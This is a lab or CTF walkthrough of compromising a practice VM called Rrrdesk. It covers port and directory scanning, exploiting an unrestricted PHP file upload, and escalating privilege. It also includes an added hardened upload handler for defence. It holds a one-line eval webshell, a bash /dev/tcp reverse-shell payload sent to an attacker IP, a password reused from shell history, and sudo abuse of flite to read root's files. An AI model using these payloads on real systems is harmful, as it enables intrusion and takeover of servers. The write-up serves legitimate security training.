Information gathering

cmd
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.237  08:00:27:91:3c:4c       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.237
cmd
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 10:04 EDT
Nmap scan report for Rrrdesk (192.168.31.237)
Host is up (0.00060s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http          Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: \xE6\x96\x87\xE4\xBB\xB6\xE4\xB8\x8A\xE4\xBC\xA0\xE9\x9D\xB6\xE6\x9C\xBA
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 08:00:27:91:3C:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms Rrrdesk (192.168.31.237)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

Directory scanning

cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.237
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,bk,zip,tar,php,php3,bak,gz,shtml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 14529]
/.html                (Status: 403) [Size: 279]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.31.237/uploads/]
/upload.php           (Status: 302) [Size: 0] [--> index.php]
/back.zip             (Status: 200) [Size: 911]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

The scan turns up /back.zip. Downloading the archive shows it contains index.php and upload.php.

index.php

php
<!DOCTYPE html>
<html>
<head>
    <title>文件上传靶机</title>
</head>
<body>
    <h2>任意文件上传</h2>
    <form action="upload.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" value="上传">
    </form>
    <hr>
    <h3>Welcome</h3>
</body>
</html>

upload.php

php
<?php
$upload_dir = '/var/www/webdav/uploads/';
$filename = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];

if (!empty($filename)) {
    // Generate an MD5 filename (keeping the original extension)
    $file_ext = pathinfo($filename, PATHINFO_EXTENSION);
    $new_name = md5(pathinfo($filename, PATHINFO_FILENAME)) . ($file_ext ? ".$file_ext" : '');

    // Move the file to the upload directory
    if (move_uploaded_file($tmp_name, $upload_dir . $new_name)) {
        echo "Upload ok";
    } else {
        echo "文件上传失败!";
    }
} else {
    header("Location: index.php");
}
?>
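Two things in this handler make the rest of the writeup possible: it keeps whatever extension the client supplies, so an uploaded .php file lands inside the served /uploads/ directory and Apache executes it, and it derives the stored name from md5() of the original basename, so the URL of the uploaded file is predictable to anyone who knows the filename. The following hardened handler is an added example, not code from the target or from the back.zip archive; the upload directory path is kept from the original, and the allowed image types, size limit and the assumption that Apache still serves the directory are illustrative.

```php
<?php
// Added example: a hardened replacement for the target's upload.php.
// Assumptions: same upload directory as the original; the allowlist of
// image types and the 2 MiB limit are illustrative values.
$upload_dir = '/var/www/webdav/uploads/';
$allowed    = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];
$max_bytes  = 2 * 1024 * 1024;

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_FILES['file'])) {
    header('Location: index.php');
    exit;
}
$f = $_FILES['file'];

// 1. Reject anything PHP itself flagged (partial upload, size limit hit, no file),
//    and refuse to act on a path that did not come from this request's upload.
if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    http_response_code(400);
    exit('upload error');
}
if ($f['size'] > $max_bytes) {
    http_response_code(413);
    exit('file too large');
}

// 2. Extension allowlist. The original kept the client's extension, which is
//    why shell.php was stored as <md5>.php and executed by Apache.
$ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
if (!array_key_exists($ext, $allowed)) {
    http_response_code(415);
    exit('file type not allowed');
}

// 3. Content check using the server-side detected MIME type. $_FILES['file']['type']
//    is sent by the client and must not be trusted.
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($f['tmp_name']);
if ($mime !== $allowed[$ext]) {
    http_response_code(415);
    exit('file content does not match extension');
}

// 4. Unpredictable stored name. The original used md5(basename), so the
//    download URL could be computed from the original filename; a random
//    name removes that, and the single allowlisted extension avoids any
//    multi-extension handler matching on names like x.php.jpg.
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
$dest     = $upload_dir . $new_name;

if (!move_uploaded_file($f['tmp_name'], $dest)) {
    http_response_code(500);
    exit('upload failed');
}

// 5. Stored file is plain data: not executable on disk.
chmod($dest, 0644);
echo 'Upload ok';
```

The handler is only half of the fix. The directory the files are served from should also have script execution disabled at the web-server level (for mod_php, `php_admin_flag engine off` inside a `<Directory>` block for the uploads path), so that even a file that slips past the checks is returned as bytes rather than run; the random filename also means the uploads directory cannot be walked by guessing names, which is what the gobuster hit on /uploads (301) invites.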

Write a one-line webshell into shell.php

php
<?php @eval($_GET['cmd']); ?>

The MD5 of the string shell works out to 2591c98b70119fe624898b1e424b5e91

So the backdoor URL is http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php

Start a listener on Kali

cmd
nc -lnvp 4444

Visit http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php?cmd=system("bash -c 'bash -i >& /dev/tcp/<kali IP>/4444 0>&1'"); (with the Kali IP address filled in) and back on Kali the connection comes in

cat /home/lemon/user.txt gives the flag

flag
flag{user-9ffbf43126e33be52cd2bf7e01d627f9}

Privilege escalation

cmd
www-data@Rrrdesk:/home/welcome$ cat /home/lemon/.bash_history
exit
flite -t 'welcome'
exit
ls -al
find .
ls -al
ss -lntup
ip a
ifconfig
ad
echo speaker | md5sum
ls -al
echo speaker | passwd
id
ls -la
exit
sudo -l
sudo gedit
sudo- l
sudo -l
sudo gedit /etc/passwd
sudo -l
sudo /usr/bin/gedit
sudo /usr/bin/gedit --display=:0
sudo /usr/bin/gedit --display=:
sudo /usr/bin/gedit --display=0
sudo /usr/bin/gedit --display=

Guessing that user lemon's password is speaker, and it logs in

Once logged in, run sudo -l in the terminal: /usr/bin/flite can be run through sudo without a password

A quick search shows it is this open-source TTS project: festvox/flite: A small fast portable speech synthesis system

The README mentions:

text
Print sentences as they are said.
./bin/flite -pw doc/alice

So running sudo /usr/bin/flite -pw /root/root.txt prints the flag

PenTest_MazeSec_Rrrdesk-1